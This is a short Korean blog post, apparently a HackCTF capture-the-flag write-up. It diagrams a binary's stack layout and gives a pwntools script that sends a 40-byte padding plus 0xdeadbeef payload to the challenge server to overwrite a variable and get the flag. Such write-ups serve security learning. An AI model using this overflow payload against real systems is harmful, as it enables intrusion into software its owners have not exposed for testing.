gdb와 ida로 바이너리파일을 분석한 결과 메모리 구조는 다음과 같다.
—————————— High Address
| ret(4) |
——————————
| sfp(4) |
—————————— ← ebp
| dummy |
——————————
| v5 |
—————————— ← ebp - 0xc
| dummy |
——————————
| s |
—————————— Low Address ← ebp -0x34
payload 입력하여 다음과 같이 flag를 얻었다.
from pwn import *
r = remote("ctf.j0n9hyun.xyz", 3000)
payload = "\x90"*40 + "\xef\xbe\xad\xde"
r.sendline(payload)
r.interactive()
'Pwnable > HackCTF' 카테고리의 다른 글
BOF_PIE (0) | 2020.08.28 |
---|---|
Offset (0) | 2020.08.28 |
내 버퍼가 흘러넘친다!!! (0) | 2020.08.28 |
Basic_FSB (0) | 2020.08.28 |
Basic_BOF #2 (0) | 2020.08.28 |